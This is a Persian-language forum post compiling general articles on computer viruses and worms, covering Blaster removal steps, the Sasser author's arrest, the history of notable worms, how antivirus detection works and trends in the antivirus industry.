7: حال مي بايست دستوري كه توسط كرم به ريجستري داده مي شود را بياييم و از بين ببريم . البته عمليات فوق را مي توان با استفاده از دستور ديگري هم انجام داد :
- در پنجره ظاهر شده بروي گزينه ي " services and application" دوبار كليك كرده، همانطور كه مشاهده مي شود ليستي از سرويسها ظاهر مي شود .
- در قسمت راست پنجره سرويسrpc- remote procedure call را جستجو كنيد .
- بروي آن كليك راست كرده و properties را انتخاب كنيد .
- بروي recovery tab كليك كنيد .
ليستهاي كركره اي موجود (( subsequent failures , second failure , first failure ))
را روي گزينه ي " restart the service " تغيير دهيد .
- apply كرده و سپس ok را بزنيد .
با انجام اين عمليات و به هنگام اتصال به اينترنت ، blaster ديگر قادر به reboot كردن سيستم نخواهد بود .



غير فعال كردن system restore در ويندوز xp
به منظور احتياط ، سرويس با زيابي خود كار ويندوز xp يعني system restore را موقتاً غير فعال مي نمائيم .
چرا كه اين قسمت از ويندوز xp بصورت پيش فرض فعال بوده و ممكن است ويندوز فايلهاي آسيب ديده ، ويروس ها ، كرم ها و برنامه هاي اسب تروآيي كه احياناً قبلاً بروي سيستم بوده اند را باز گرداند. براي غير فعال كردن اين قسمت در ويندوز xp به آدرس زير مراجعه كنيد :
(( startmenu/ setting/ controlpanel/ performance and
maintenance/ system/ system restore tab ))
و سپس گزينه ي زير را فعال مي كنيم :
"turn of system restore on all drives "
ويروسهاي كامپيوتري : خدمت يا خيانت ؟
اين نخستين بار است كه يك شركت كامپيوتري در حد و اندازه مايكروسافت باري به دام انداختن يك ويروس نويس وارد عمل مي شود .
به نظر مي رسد آن چه كه شركت مايكروسافت را وادار به حضور در عرصه هاي امنيت
كامپيوتري در مقابله با خرابكاران كامپيوتري مي كند ضربه هاي متعددي است كه خصوصا طي چند ماه اخير بر سيستم عامل هاي اين شركت وارد آمده است. شايد به همين علت است كه آنها از چند روز قبل با تعيين 50 ميليون دلار جايزه عملا به تيم هاي تحقيقاتي fbi , cla پيوستندو نتايج فعاليت آنها به دستگيري نويسنده ويروس ساسر انجاميد . نوجوان 18 ساله آلماني پيش ازآن كه ماموران پليس بخش هانوفر را جلو در منزل خود ببيند هيچ گاه تصور نمي كرد كرم رايانه اي كه او نگارش آن را انجام داده ودرطي مدت كوتاهي ميليون ها كامپيوتر در سر تا سر جهان را آلوده ساخته است بتواند به اين سادگي صاحب خود را گرفتار پليس كند .
هر چند اين كرم كوچك رايانه اي در ابتداي شناسايي خود از طرف شركت هاي ضد ويروس كم خطر اعلام شد اماكمي بعد با گسترش شتاب گونه ، ناگهان در سر تا سر جهان پخش گرديد و درنقاطي نيزبرخي فعاليتهاي حياتي را متوقف ساخت . هر چند مقامات شركت مايكروسافت از اين ابتكار خود در قرار دادن جايزه كه منجر به دستگيري اين پسرك آلماني شد راضي به نظرمي رسند اما خود آنها نيز مي دانند ويروس نويسان همواره چند پله جلوتر از شركت هاي كامپيوتري بوده اند . بنابر گزارش خبر گزاري ها آن چه كه منجر به دستگيري اين پسر آلماني شد اطلاعاتي بود كه توسط فرد ديگر كه همشهري فردويروس نويس بود به مايكروسافت و مقامات پليس ارائه شده بود. شيوه اي كه مايكروسافت دربرخورد با اين كرم درپيش گرفت به گونه اي مقابل قراردادن متخصصان امنيتي و يا حتي ويروس نويسان با هم است .
به اين ترتيب وظيفه يافتن يك خرابكار صرفا به دانش چند متخصص امنيتي شبكه در يك كشورخاص محدود نمي شود ، كسب 5 ميليون دلار آن قدر وسوسه انگيز است كه يك فرد آلماني نويسنده ويروس ساسر را به آمريكايي ها معرفي كند.
از عمر ويروس ساسر چند هفته اي نمي گذرد . اين ويروس از تكنيكي بهر ميبرد كه سال قبل ويروس مشهور بلستر آن را به كار گرفت تا ميليون ها كامپيوتر را در سراسر جهان بارها rebootكند . ويژگي اصلي هر دو كرم ، آلوده كردن سيستم هاي كامپيوتري بدون استفاده ازايميل ويا فايل هاي الصاقي ديگراست . كرم از طريق نقاط ضعفي كه سيستم عامل ويندوز دارد واز طريق tcp/ ip به سيستم هاي كامپيوتري نفوذ مي كند و پس از آلوده شدن دستگاه اعلام يك پيغام خطا يا reboot ظاهر مي شود و دستگاه به اصطلاح دوباره راه اندازي مي شود .
طي روزهاي بحراني آلودگي اين ويروس بيمارستان ها ، بانك ها ، شركتهاي هواپيمايي ،
سازمانهاي دولتي وكاربران خانگي بامشكلات عمده اي روبه روشدندحتي درروزدستگيري
نويسنده آن اعلام شد كه به رغم نسخه هاي اصلاحي نصب شده روي رايا نه ها وبازگشت
شرايط به حالت عادي امكان بازگشت مجدد اين ويروس وجود دارد. نگاهي به چرخه ويروسهاي كامپيوتري طي چند سال اخير نشان مي دهد همگام با پيشرفت راه هاي امنيتي مبارزه با حملات اينترنتي و ويروس ها اين نرم افزار هاي كوچك موذي نيز خود را با محيط تطبيق داده وبه اصطلاح هوشمند تر و مخرب تر شده اند . اگر تا چند سال قبل عمده تاثير ويروس ها پاك شدن اطلاعات چند كاربر و يا حداكثر يك صدمه سخت افزاري نه چندان شديد بود ويروس ها ي هوشمند امروزين گاه جريان هاي حياتي يك جامعه را هدف قرار مي دهند اين موضوع خصوصاً براي جوامعي كه بيش ترين توسعه كامپيوتري را داشته اند و بسياري از امور خود را روي شبكه ويا اينترنت منتقل كرده اند تاثير بيشتري داشته است . در ايران بلافاصله پس از هجوم اين ويروس به اينترنت نشانه هاي آلودگي آن مشاهده شد حتي يكي از نمايندگان شركت هاي آنتي ويروس ادعا كرد ويروس ساسر بيش ترين قرباني را در ايران داشته است .
هر چند اين ادعا كمي اغراق آميز به نظر مي رسيد اما گزارش ها حاكي از تاثير اين ويروس روي چندين شركت بزرگ و كوچك و مراكز اداري چون روزنامه ها و ... بوده است . به رغم اين به نظر مي رسد عقب ماندگي كامپيوتري كشور و عدم اتصال شريان هاي حياتي و دستگاه هاي مختلف به اينترنت باعث كم بودن اين ويروس در كشور شده است البته اين موضوع درمقابل بسياري از منافعي كه گسترش تكنولوژي آي تي در كشور ايجاد مي كند بسيار كوچك وكم اهميت می نمايد. برخي از كارشناسان معتقدند كرم هاي امروزين پس از ظهور براي نخستين بارپس از مدتي دوباره باشكل تغيير يافته مشاهده خواهند شد . نمونه كرم هايي چون نت اسكاي كه طي يكي دو مه گذشته چندين نسخه از آن در اينترنت شنا سايي شده نشان مي دهد ويروس هاي امروزين به سادگي از بين نمي روند و عمر طولاني تري دارند . به گفته برخي ازكارشناسان بعضي از ويروسها مثل code red , sqlslammerهنوز روي اينترنت مشغول فعاليت هستند . حتي برخي پيش بيني مي كنند ويروسهاي آينده با تركيب كردن قابليت هاي امروزين به اندازه اي خطرناك تر خواهند بود كه بسياري از افراد دسترسي خود به اينترنت را قطع كنند .
• زنده براي هميشه
تصوري كه از ويروس هاي كامپيوتري براي نخستين بار در ذهن يك كاربر كامپيوتر مجسم ميشود چيزي شبيه به ويروس هاي بيماري زا است اما اگر گفته شودويروسهاي كامپيوتري به نسبت همتايان انساني خود مفيدتر و سازنده تر هستند حرف بي راهي نيست چرا كه نرم افزارهاي كوچك با شناسايي نقاط ضعف سيستم ها طي سال هاي گذشته كمك شاياني به رشد امنيت سايت ها ، شبكه هاي كامپيوتري و نرم افزارها كرده اند . ويروس ها معمولا از قطعه نرم افزاركوچكي تشكيل شده اند كه بر دوش يك برنامه حقيقي حمل مي شود مثلا يك ويروس مي تواند دركنار ويرايشگر الصاق شود و هر بار كه اين برنامه اجرا مي شود ويروس يك كپي از خود ايجادكرده و يا طبق برنامه نوشته شده براي آن دستورات تخريبي خاص را در سيستم اجرا كند . به نوشته سايت srco ويروس هاي كامپيوتري بدين دليل ويروس ناميده شده اند چون داراي برخي وجوه مشترك با ويروس هاي زيست شناسي هستند . يك ويروس كامپيوتري از كامپيوتري به كامپيوتر ديگر عبور كرده دقيقا مشابه ويروس هاي زيست شناسي كه از شخصي به شخص ديگر منتقل مي شود . ويروس زيست شناسي يك موجود زنده نيست ، ويروس بخشي از dna بوده و داخل يك روكش حفاظتي قرار مي گيرد .
ويروس برخلاف سلول قادر به انجام عمليات و يا تكثير مجدد خود نيست ، يك ويروس زيست شناسي مي بايست dnaخودرا به يك سلول تزريق نمايد dnaويروسي در ادامه با استفاده از دستگاه موجود سلول قادر به تكثير خود مي گردد . در برخي حالات سلول با ويروس جديد آلوده تا زماني كه سلول فعال و با عث رها سازي ويروس گردد در حالات ديگر ذرات ويروس جديد باعث عدم رشد سلول در هر لحظه شده و سلول همچنان زنده
باقي خواهند ماند . به هرحال يك ويروس كامپيوتري مي بايست بر دوش ساير برنامه ها و يا مستندات قرا ر گرفته تادرزمان لازم شرايط اجراي آن فراهم گردد. پس از اجراي يك ويروس زمينه آلوده كردن سايربرنامه ها و يا مستندات نيز فراهم مي شود اما كرم ها تفاوت آشكاري با ويروس ها دارند چرا كه كرم ، يك برنامه كامپيوتري است كه قابليت تكثير خود از ماشيني به ماشين ديگر را دارا است .
شبكه هاي كامپيوتري بستر مناسب براي حركت كرم ها و آلوده كردن ساير ماشين هاي موجود در شبكه را فراهم مي آورند . با استفاده از شبكه هاي كامپيوتري كرم ها قادر به تكثير باورنكردني خود در اسرع زمان هستند مثلا كرم code red كه در سال 2001 مطرح گرديد قادربه تكثير خود به ميزان 250000 مرتبه در مدت زمان نه ساعت است .
همچينين كرم code reنيز درزمان تكثير به ميزان قابل ملا حظه اي سرعت ترافيك
اطلاعاتي بر روي اينترنت را كند مي كرد ، هر نسخه از كرم فوق پيمايش اينترنت به منظوريافتن سرويس دهندگان ويندوز آنتي يا 2000 را آغاز مي كرد و هر زمان كه يك
سرويس دهنده ناامن(سرويس دهنده اي كه بر روي آن آخرين نرم افزار هاي امنيتي مايكروسافت نصب نشده بود) پيدا مي شد كرم نسخه اي از خود را بر روي سرويس دهنده تكثير مي كرد و نسخه جديد نيز در ادامه عمليات پيمايش براي يافتن ساير سرويس دهندگان كار خود را آغاز مي كرد . با توجه به تعداد سرويس دهندگان ناامن ، يك كرم قادر به ايجاد صدها و هزاران نسخه از خود است.
ايجاد كنندگان ويروس هاي كامپيوتري افرادي آگاه و با تجربه بوده و همواره از آخرين حقه هاي موجود استفاده مي كنند . يكي از اين حقه هاي مهم در خصوص قابليت استقرار در حافظه واستمرار وضعيت اجراي خود در حاشيه است ( البته تا زماني كه سيستم روشن باشد ) بدين ترتيب امكان تكثير اين نوع ويروس ها با شرايط مطلوب تري فراهم مي شود .
يكي ديگر از حقه ها ي موجود قابليت آلوده كردن بوت سكتور فلاپي ديسك ها و هارد ديسك ها است ، بوت سكتور شمال يك برنامه كوچك به منظور استقرار بخش اوليه يك سيستم عامل درحافظه است . با استقرار ويروس هاي كامپيوتري در بوت سكتور اجرا شدن آن تضمين خواهد شد بد ين ترتيب يك ويروس بلافاصله در حافظه مستقر وتا زماني كه سيستم روشن باشد به حضور مخرب خود در حافظه ادامه خواهند داد. ويورس هاي بوت سكتور قادر به آلوده كردن ساير بوت سكتور هاي فلاپي ديسك هاي سالمي كه در درايو ماشين قرار خواهند گرفت نيز ميباشد در مكان هايي كه كامپيوتر به صورت مشترك بين افراد استفاده مي گردد بهترين شرايط براي تكثير ويروس هاي كامپيوتري به وجود خواهد آمد .
• رابين هود عالم اينترنت
همه ساله ويروس هاي كامپيوتري ميليون ها دلار خسارت به شبكه هاي كامپيوتري وارد مي سازند و همه ساله ميليون ها دلار نصيب شركت هاي سازنده آنتي ويروس و نرم افزارهاي امنيتي مي شود به نظر مي رسد اين جنگ و گريز بين ويروس هاي كامپيوتري و شبكه ها به اين زودي ها قابل رفع نباشد حتي برخي از افراد بدين معتقدند بيشتر ويروس ها توسط شركت هاي آنتي ويروس توليد مي شوند چرا كه تنها كاربران از ترس ويروس است كه به سراغ نرم افزارهای هاي اين شركت ها مي روند . واقعيت اين است كه ويورس هاي كامپيوتري براي نفوذ به سيستمهاي افراد راه هاي متفاوتي را آزمايش كرده اند . ويروس سوبيگ كه يك ماه قبل در اينترنت مشاهده شد فشار شديدي را به شبكه اينترنت و سيستم هاي شركت هاي تجاري وارد و بسياري از آنها را دچار كندي كرد .
اين ويروس يزاي آن كه توسط كاربران شناسايي نشود مرتبا موضوع پيغام هاي آلوده خود را تغيير مي داد با اين ترتيب كاربران كم تجربه از ريسك بيشتري براي گشودن نامه هاي آلوده به اين ويروس برخودار مي شدند . ويروسي مانند نت اسكاي تغيير عنوان نامه را به اوج رساند به نحوهي كه با تغيير نام و آدرس فرستنده ايميل كاربران را دچار اين شك مي ساخت كه اين نامه از طرف يك دوست برايشان ارسال شده است. ويروس mydoom كه از ژانويه سال 2004 فعاليت خود را آغاز كرد تنها طي 36 ساعت 100 ميليون ايميل آلوده ايجاد كرد. اين ويروس كه از ضعف هاي سيستم عامل مايكروسافت بهره مي برد از طريق يك فايل ضميمه در نامه الكترونيكي منتشر مي شد و به آدرس هايي كه از طريق ضعف مزبور بر روي يك سيستم يافته بود ايميل آلوده ارسال كرد . ميزان آلودگي اين ويروس به حدي بود كه گفته مي شد يكي از هر12 ايميل ارسالي را در برمي گرفت و در بيش از 200 كشور جهان مشاهده مي شد . يك سال قبل ويروسي كه شباهت آشكاري به ويروس ساسر داشت و باعث reboot كردن كامپيوتر هامي شد تمام دنياي كامپيوتر را بهم ريخت .
اين ويروس كه ام اس بلاست نام داشت به سرعت مشهور شدچرا كه با دستور ساده خود مبني برراه اندازي مجدد ويندوزعملا جلوي استفاده از دستگاه را مي گرفت . اين ويروس به گونه هوشمندانه نوشته شده بود كه بعد ازآ لوده كردن يك دستگاه به دنبال دستگاه متصل به آن مي گشت تا آنها را نيزآلوده سازد . گفته مي شد اين ويروس در اوج فعاليت خود تنها ظرف 30 ثانيه را يا نه هاي سالم را پيدا مي كرد و تخمين زده مي شد بيش از 500 هزار رايانه توسط انواع مختلف اين ويروس آ لوده شده است اما شايد يكي از قديمي ترين ويروس هاي نسل فعلي كه فعاليت آن تاثير بسزايي روي نوع نگرش به ويروس ها داشت ويروس مشهور love letter بود كه در ميان مردم به I love you شهرت پيدا كرده بود و ... اما در نظر داشت ويروس ها همچنان كه برخي اعمال تخريبي نيز به همراه داشته اند به گونه اي گاه مصارف مفيدي نيز يراي آنها تصور مي شود .
به عنوان نمونه ويروس ولچي يا نا چي كه از شيوه تخريبي ام اس بلاست بهره مي برد نمونه اي از يك ويروس نيكوكار بود . اين ويروس بعد از ورود به سيستم تلاش مي كرد بسته تازه نرم افزار هاي مايكروسافت را روي سيستم نصب كند و اگر كرم بلاستر را روي سيستم مي يافت آن را حذف مي كرد ، مشاور ارشد يك شركت ضد ويروس نويسنده اين ويروس نيكوكار را رابين هود عالم اينترنت ناميد كه مي خواهد ويروس پليدام اس بلاست را نابود كند .
به نظر مي رسدويروسهاي كامپيوتري ماهيت دو گا نه اي دارند ،آنها از يك سوي تخريب مي كنند و خسارت به بار مي آورند و از سوي ديگر نتايج كار آنها جلو تخريب هاي بيش تروخسارت سنگين تر را مي گيرد . با چنين رويكردي آيا مي توان آنها را به طور مطلق مفيد يا مضر خواند ؟

نتیجه
هر روزه برنامه ها ، هدف، حمله ها و خطرهای بی شماری در اینترنت قرار می گیرد که از نظر تعداد می توان 95 تا از هر صد حمله را متوقف کرد ولی همین 5 خطر باعث کاهش امنیت به مقدار 20% می شوند چون این خطرها توسط افراد عادی و تازه کار نیست و عاملان آنها در کار خود بسیار تبحر دارند و در اکثر موارد می توانند از تمام مرزهای امنیتی گذشته و به طور کامل به مقصود خود برسند.
برای این منظور می توان
1- از یک نرم افزار ضد هکر با آخرین به روز رسانی ها استفاده کرد.
2- استفاده از ویروس کشهای Nortonanti Virus 2005, Mcafee که اگر pack کامل باشد خیلی بهتر است.
باید توجه داشت که نرم افزارهای فوق را از سایتهای اصلی آنها بگیریم و اقدام به خرید آنها نکنیم.
3- سطح ایمنی و یروس کشی را در حالت high بگذاریم تا تمام فایلها، با هر پسوندی که هستند ویروس کشی شوند.
4- service pack های ویندوز را دانلود کنیم و همیشه ویندوز خود را به روز نگه داریم .
5- تنظیمات صحیح خود سیستم عامل و عدم به اشتراک گذاری فایلها
ک . اسحاقی
تابستان 85


منابع ومآخذ

سایت اینترنت :

کتاب جهان نما ویروسها – دکترسعید شریعتی – چاپ 1384
کتاب خطردراینترنت – علیرضا حسین پور – چاپ 1384


==================================================
طراحی وب سایت
پروژه های برنامه نویسی تجاری
دانلود پروژه های ASP.NET وب سایتهای آماده به همراه توضیحات
دانلود پروژه های سی شارپ و پایگاه داده SQL Server همراه توضیحات و مستندات
دانلود پروژه های UML نمودار Usecase نمودار class نمودرا activity نمودار state chart نمودار DFD و . . .
دانلود پروژه های حرفه ای پایگاه داده SQL Server به همراه مستندات و توضیحات
پروژه های حرفه ای پایگاه داده Microsoft access به همراه مستندات و توضیحات
دانلود پروژه های کارآفرینی
دانلود گزارشهای کارآموزی کارورزی تمامی رشته های دانشگاهی
قالب تمپلیت های آماده وب سایت ASP.NET به همراه Master page و دیتابیس
برنامه های ایجاد گالری عکس آنلاین با ASP.NET و JQuery و اسلایدشو به همراه کد و دیتابیس SQL کاملا Open Source واکنشگرا و ساده به همراه پایگاه داده
==================================================
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
06-05-2017, 10:21 AM
ارسال: #30
RE: ساختار ویروسها و برنامه های مخرب کامپیوتری
ويروس ها چگونه منتشر مي شوند
اگر كسي چيزي در مورد كامپيوتر ها نداند اين را مي داند كه ويروسها مخرب هستند و بايد كامپيوتر خود را در برابر هجوم آنها حافظت كند. كمپاني هاي ضد ويروس ( آنتي ويروس ) تعداد زيادي ويروس را ساپورت مي كنند. ولي هيچ كدام از آنها كامل نيستند. آنتي ويروسهاي امروزي بيشتر عمل حفاظت را به طور واكنشي انجام مي دهند تا به صورت كنشي. يعني براي براي اينكه آنتي ويروس شما متوجه ويروس جديد در كامپيوتر شود بايد تا آخرين بيت وارد كامپيوتر شما شود و شروع به فعاليت كند. سناريوي پخش يك ويروس جديد در اينترنت و عكس العمل شركت هاي آنتي ويروس در برابر آن به صورت زير است:
• ابتدا يك ويروس به طور متوسط صد هزار كامپيوتر را مورد هجوم قرار مي دهد.
• سپس شركت هاي آنتي ويروس شروع به ساختن پكيج براي آنها مي كنند.
• در مرحله بعد اين پكيج در اختيار عموم قرار مي گيرد.
مشكل اين است كه ممكن است كامپيوتر شما قبل از ساختن اين پكيج مورد حمله قرار گيرد. مشكل ديگر اين است كه اكثر افراد آنتي ويروس كامپيوتر خود را « به روز » يا « up to date » نمي كنند. كمپاني هاي ضد ويروس بيشتر به صورت اكتشافي عمل مي كنند. و اين كار را بوسيله برنامه هاي آشكار سازي انجام مي دهند. اين برنامه ها كليه اعمالي را كه در كامپيوتر بوسيله برنامه هاي ديگر انجام مي شود تحت نظر مي گيرند و هر گاه اين اعمال با كارهايي كه يك ويروس در كامپيوتر انجام مي دهد مطابقت كند آن را به عنوان يك ويروس شناسايي مي كنند.سپس جلوي فعاليت آن را مي گيرند و همچنين وجود ويروس را به كاربر گوشزد مي كنند. با عمل كردن اين برنامه آشكار ساز در نرم افزار آنتي ويروس هر گاه يك برنامه فعاليت مشكوكي انجام دهد به كاربر هشدار مي دهد و احتمالاً جلوي انتشار ويروس گرفته مي شود. اين عمل باعث مي شود كامپيوتر ها كمتر آلوده شوند.
نرم افزار آنتي ويروس بايد به گونه اي تنظيم شود كه كه روزانه به طور اتوماتيك اجرا شود كه شامل به روز كردن و اسكن كردن است.
برنامه هاي اكتشافي (Heuristics ) اين فرصت را مي دهند كه زودتر جلوي انتشار ويروس ها گرفته شود. هر چند استفاده از اين برنامه ها يك راه صددرصد فراگير نيست. ولي بسيار مشكل گشا است. و حساسيت اين برنامه ها به تنظيم سطح حفاظت ( Level Setting ) در نرم افزار آنتي ويروس بستگي دارد. يعني آنتي ويروسي كه در كامپيوتر شما نصب شده است و تنظيمات آن به كشف ويروسها كمك مي كند.
● تغییرات در صنعت آنتی ویروس
در چند سال گذشته، صنعت آنتی ویروس دستخوش تغییرات اساسی شده است. پیشروان بازار تغییر یافته اند (McAfee جای خود را به Symantec واگذار کرده است)، تعدادی از شرکتهای سازنده آنتی ویروس یا از بازار رخت بربسته اند یا توسط شرکتهای دیگر تصاحب شده اند (شرکت رومانیایی RAV و شرکت استرالیایی VET از آن جمله اند)، و همچنین بازیگران جدیدی در بازار حضور یافته اند (مانند Bit Defender و ClamAV). با این حال پیش از اینکه به بحث در این خصوص بپردازیم، موارد زیر می بایست مورد توجه قرار گیرند:
1. این مقاله صرفاً راهکارهای استاندارد ضد ویروس ارائه شده برای کامپیوترهای خانگی، ایستگاههای کاری و سرورهای E-mail و Fileو (File & Email Server)در شبکه های بزرگ را مورد بحث قرار می دهد. با این استدلال می توان آنتی ویروسهای عرضه شده برای دستگاههای موبایل را نیز در بحث وارد نمود. حملات ویروسی که دستگاههای موبایل را هدف قرار می دهند ممکن است اکنون چندان معمول نباشند ولی احتمالاً این شرایط در چند سال آینده دستخوش تغییرات بنیادین می گردد. این مقاله راهکارهای سخت افزاری آنتی ویروس (همانند Gatewayها و مسیریابهای دارای امکان اسکن ویروسها) یا راهکارهایی برای سیستمهای بزرگ Unix را مورد بررسی قرار نمی دهد؛ ضمن آنکه سایر فیلترهای آنتی ویروس را که برای منظورهای خاص طراحی شده اند نیز تحت پوشش ندارد.
2. بعلاوه، بحث حاضر ارتباطی با جنبه تجاری این صنعت نخواهد داشت. بی شک، چگونگی بازاریابی بر میزان سهم بازار هر شرکت مستقل تاثیر گذار است، اما راهکارهای امنیتی (که آنتی ویروس از آن جمله است) همانند پودر لباسشویی یا خمیر دندان نیستند. کاربران نهایی یک راهکار امنیتی را به دلیل شیوه بازاریابی آن انتخاب نمی نمایند.
واضح است که راهکارهای استاندارد آنتی ویروس راه رشد را در پیش می گیرند. برای درک طبیعت چنین راهکارهایی و شناسایی گرایشات، به شناخت فاکتورهای تاثیرگذار بر صنعت آنتی ویروس نیاز خواهیم داشت.

فاکتور شماره 1: تداوم جنبه های جرم خیز اینترنت
هر جامعه ای با هر اندازه ای (مانند یک شهر یا یک کشور) دارای عناصر مرتبط با جرایم است. سطوح جرایم بر اساس مولفه های زیر شناخته می شوند:
• اندازه جامعه (هر چقدر اندازه بزرگتر باشد میزان جرایم بالقوه و بالفعل بیشتر است).
• میزان توسعه یافتگی اقتصادی (در کشورهای توسعه یافته، کسب درآمد از راههای مشروع آسانتر است).
• میزان تواناییهای سازمانهای اعمال قانون (همانند پلیس) جهت بررسی جرایم و به زندان افکندن مرتکبین جرایم اینترنت نیز از این قاعده مستثنی نیست. اندازه آن بسیار بزرگ بوده و بسیاری از کشورهای تشکیل دهنده این جامعه (اینترنت) از دیدگاه اقتصادی توسعه نیافته اند. از دلایل ممکن برای این نوع نگرانی می تواند برنامه «کامپیوتر ارزان برای کشورهای فقیر جهان سوم» به شمار آید. چنین برنامه هایی بطور مضاعف تشویق کننده فعالیتهای مجرمانه در فضای اینترنت هستند. آمارهای مربوط به تعداد برنامه های مخرب، برآمده از کشورهایی خاص، بیانگر این موضوع است. کشور چین به عنوان پیشرو در میان نویسندگان ویروس شناخته می شود؛ به دنبال آن آمریکای لاتین و روسیه و کشورهای اروپای شرقی با فاصله کمی قرار گرفته اند.
از دیدسازمانهای اعمال قانون، نظربه نبود هیچ نوع مرزی برای اینترنت، عمدتاً، عملیات بازرسی و بررسی جرایم فضای سایبر کار پیچیده ای است.
مطالب و خبرهای پیرامون سه سطح پیش گفته، به روشنی اظهار می دارند که میزان جرایم اینترنتی نه تنها بسیار زیاد بلکه در حال ازدیاد است. گواه این مدعا، دو برابر شدن تعداد برنامه های جُرم افزار (CrimeWare) در طی چند سال گذشته است که این خود بیانگر دو چندان شدن فعالیتهای مجرمانه اینترنتی در مدت زمانی یاد شده می باشد و هیچگونه چشم اندازی هم برای کند شدن این میزان رشد در آینده وجود ندارد.
نتیجه: نظر به نیازمندی بیشتر جهت بررسی کدهای مخرب، فشار وارده به شرکتهای سازنده آنتی ویروس افزایش خواهد یافت. شرکتهایی که نتوانند به سرعت برنامه های مخرب جدید را شناسایی نموده و در نتيجه مشتریان خود را در برابر این برنامه های پشتیبانی ننمایند، با کاهش سهم بازار روبرو شده و نخواهند توانست در این رویارویی حرفه ای حضور داشته باشند.

فاکتور شماره 2: افزایش شمار گونه های برنامه های مخرب و روشهای حمله
ده سال پیش از این، یعنی سال 1996 میلادی برنامه های مخرب به دو دسته تقسیم بندی می شدند: ویروسها و تروجانها. در آن زمان چیزی به نام Malware که مورد استفاده آن در امور مجرمانه است وجود نداشت. در طول دهه گذشته برنامه های مخرب (Malware) بسیار پیچیده و متنوع شده اند:
• کرمهای شبکه ای
• گستره بسیار وسیعی از تروجانها و جاسوس افزارها (Spyware)
• آگهی افزارها (Adware)
• برنامه های خرابکار مرتبط با امور معمول (همانند برنامه های درج کننده کلیدهای زده شده – Key Logger – و ابزارهای مدیریت از راه دور)
• گستره وسیعی از هرزنامه ها، از نامه های درخواست پول تا نامه های تهدید کننده
• فیشینگ (Phishing) – نوع آشکاری از خرابکاریهای مرتبط با امور مالی
• حملات محیط شبکه
• دیگر موارد
بیشترین میزان برنامه های مخرب برای سیستمهای ویندوز 32 بیتی نوشته شده اند. تعداد برنامه های مخربی که سیستمهای عامل Linux، Mac OS و تلفنهای هوشمند (مشتمل بر گستره ای از سیستمهای عامل) مورد هدف قرار می دهند تاکنون قابل توجه نبوده است. ضمن آنکه ویروسهای محیطهای ویندوز 64 بیتی نیز انگشت شمارند.
نتیجه: شرکتهای سازنده آنتی ویروس می بایست برروی گونه های گسترده ای از برنامه های مخرب فعالیت نمایند. این موضوع نه تنها به معنای ایجاد محصولات جدید، بلکه ارائه پشتیبانی آنهاست (آزمودن و انتشار نسخه روزآمد شده رده کامل محصولات). شرکتهایی که توانایی همراهی و دنبال کردن فناوریهای جدید را نداشته باشند، نخواهند توانست در صنعت جدید جایگاهی را از آن خود نمایند. بعلاوه، این شرکتها، بازار فعلی خود را از دست داده و رقبای کنونی و یا بازیگران جدید این عرصه از مزایای بازار و فرصتهای جدیدی که بدست می آورند بهره خواهند برد.

فاکتور شماره 3: شرکت مایکروسافت
مایکروسافت در صدد است که به طور جدی بر بازار راهکارهای امنیتی تمرکز نماید و این در برگیرنده راهکارهای کنونی آنتی ویروس نیز می باشد. به همین دلیل صنعت آنتی ویروس در شوک به سر می برد. همه به یاد می آورید که شرکتهایی نظیر NetScape پس از تولید محصولات مشابه محصولات آنها توسط مایکروسافت، سهم بازار خود را از دست داده و یا همگی محو شدند.
مایکروسافت در نظر دارد که محصولات زیر را وارد بازار نماید:
• آنتی ویروس برای کامپیوترهای خانگی
• آنتی ویروس برای ایستگاههای کاری (برنامه ریزی شده برای آینده)
• راهکارهایی برای نرم افزار MS Exchange (که از محصول Multi-Engine شرکت
ybari با نام Anti-Gen استفاده می نماید)
این موضوع که حضور این غول تجاری همچون تند بادی است برای سایر تولید کنندگان کاملاً واقعی است؛ اما این تندباد چقدر شدت خواهد داشت؟
کاربران از دیدگاه بزرگی و شکل، گوناگون اند. بر این اساس چه فاکتورهایی در مورد خرید یک راهکار آنتی ویروس، برای آنها اهمیت دارد؟
1. ظاهر کالا: کاربر ارزانترین نوع و یا جذابترین نوع بسته بندی را انتخاب می نماید.
2. نام تجاری: کاربر ممکن است نام تجاری را که به آن وفادار است و یا بازاریابی خوبی بر روی آن صورت گرفته انتخاب نماید.
3. نام تجاری: کاربرانی که فرض را بر نخریدن محصولات مایکروسافت گذاشته اند، به راهکارهای آنتی ویروس تولید شده توسط این تولید کننده اعتماد نخواهند داشت.
4. کارایی: کیفیت عمومی محصول مورد نظر کاربر خواهد بود.
واضح است که این فاکتورها و گونه های مختلف کاربران که به آن اشاره شد، به صورت مطلق وجود ندارند. در واقع فاکتورهایی که بر روی انتخاب کاربران تاثیر می گذارند مجموعه ای از موارد یاد شده هستند. در بحث کاربران خانگی، مورد شماره 2 بیشترین تاثیر را بر بازار خواهد داشت. در بحث کاربران شبکه های بزرگ، موارد دوم و چهارم بیشترین تاثیر را بر بازار دارند. بمنظور پیش بینی سهم بازار مایکروسافت در آینده و نیز بازارهای از دست رفته سایر شرکتها که موجب زیان آنها خواهد شد، بررسی دقیق موارد فوق الزامی است. این کار عملیات ساده ای است که با بررسی مصرف کنندگان و کاربران می تواند به انجام رسد.

نتایج
همانگونه که اشاره گردید، سه فاکتور اساسی تاثیر گذار بر صنعت آنتی ویروس وجود دارند:
• جرم خیزی اینترنت
• گونه های متفاوت اعمال مجرمانه
• حفاظت در برابر ویروسها بر اساس نرم افزارهای شرکت مایکروسافت

بازار آنتی ویروس در آینده به میزان فراوانی توسط این سه فاکتور تحت تاثیر قرار خواهد گرفت.

پس آیا زمان آن فرا رسیده که از کار دست کشید؟
پاسخ به این پرسش چندان واضح نیست. ما می بایست نخستین تلاش شرکت مایکروسافت برای ساختن یک راهکار یکپارچه آنتی ویروس در سال 1994 با نام MSAV برای سیستم عامل DOS را به خاطر بیاوریم. این تلاش ناموفق بود. بندرت اتفاق می افتد که یک اشتباه دوبار تکرار شود. از سال 1994 تاکنون 12 سال گذشته و از آن زمان تاکنون چیزهای زیادی تغییر کرده است. مهمترین مطلب آنست که تقاضای مصرف کنندگان برای کیفیت مطلوب محصولات در مواردی از قبیل میزان شناسایی، سرعت واکنش به تعداد فراوان حملات، تناوب روزآمد سازی و فناوریهای محافظت پیشگیرانه افزایش یافته است.
